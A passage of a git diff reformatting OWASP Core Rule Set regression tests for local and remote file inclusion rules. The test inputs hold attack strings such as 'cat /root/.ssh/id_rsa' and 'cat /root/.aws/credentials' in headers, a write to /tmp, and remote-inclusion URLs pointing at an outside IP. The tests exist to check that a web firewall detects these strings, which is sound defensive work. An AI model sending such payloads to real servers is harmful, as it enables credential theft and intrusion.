- test_id: 7 desc: "LFI via parameter value: /etc/subuid" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 8 desc: "LFI via parameter value: /etc/subuid-" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid-" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid-" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 9 desc: | YM9WT5NU Disallow writing files to /tmp/ stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp/curl" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp/curl" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 10 desc: | YM9WT5NU False positive test stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp" - version: "HTTP/1.1" - output: - no_log_contains: id "930120" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp" + version: "HTTP/1.1" + output: + no_log_contains: id "930120" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index ca1a8aa9e..6bee94f87 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml @@ -1,216 +1,204 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 930121.yaml tests: - - test_title: 930121-1 + - test_id: 1 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 2 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /etc/apache2/apache2/apache2.conf" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /etc/apache2/apache2/apache2.conf" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 3 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 4 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 5 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 6 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 7 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 8 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 9 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 10 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index caccac5ab..8b0a1c6f3 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -2,38 +2,35 @@ meta: author: "Andrew Howe, azurit" description: "None" - enabled: true - name: "930130.yaml" +rule_id: 930130 tests: - - test_title: 930130-1 + - test_id: 1 desc: "LFI via URI: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930130" - - test_title: 930130-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/sys/class" + version: "HTTP/1.1" + output: + log_contains: id "930130" + - test_id: 2 desc: "LFI via URI: /proc" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/proc/interrupts" - version: "HTTP/1.1" - output: - log_contains: id "930130" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/proc/interrupts" + version: "HTTP/1.1" + output: + log_contains: id "930130" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index 11fc083e5..368dd5005 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -2,27 +2,24 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 931100.yaml tests: - - test_title: 931100-1 + - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" - version: "HTTP/1.1" - output: - log_contains: id "931100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" + version: "HTTP/1.1" + output: + log_contains: id "931100" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index dbb3b8fb5..d5983803d 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -2,69 +2,64 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 931110.yaml tests: - - test_title: 931110-1 + - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log_contains: id "931110" + - test_id: 2 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" + version: "HTTP/1.1" + output: + log_contains: id "931110" + - test_id: 3 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log_contains: id "931110" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 44e910d55..5a4050483 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -2,134 +2,124 @@ meta: author: "studersi, azurit" description: None - enabled: true - name: 931120.yaml tests: - - test_title: 931120-1 + - test_id: 1 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 2 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 3 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 4 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 5 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 6 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 7 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" - - test_title: 931120-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?foo=bar" + version: HTTP/1.1 + output: + no_log_contains: id "931120" + - test_id: 8 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar&foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar&foo=bar" + version: HTTP/1.1 + output: + no_log_contains: id "931120" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 36542f7d3..56524bf51 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -2,358 +2,334 @@ meta: author: "studersi, azurit" description: None - enabled: true - name: 931130.yaml tests: - - test_title: 931130-1 + - test_id: 1 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 2 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: 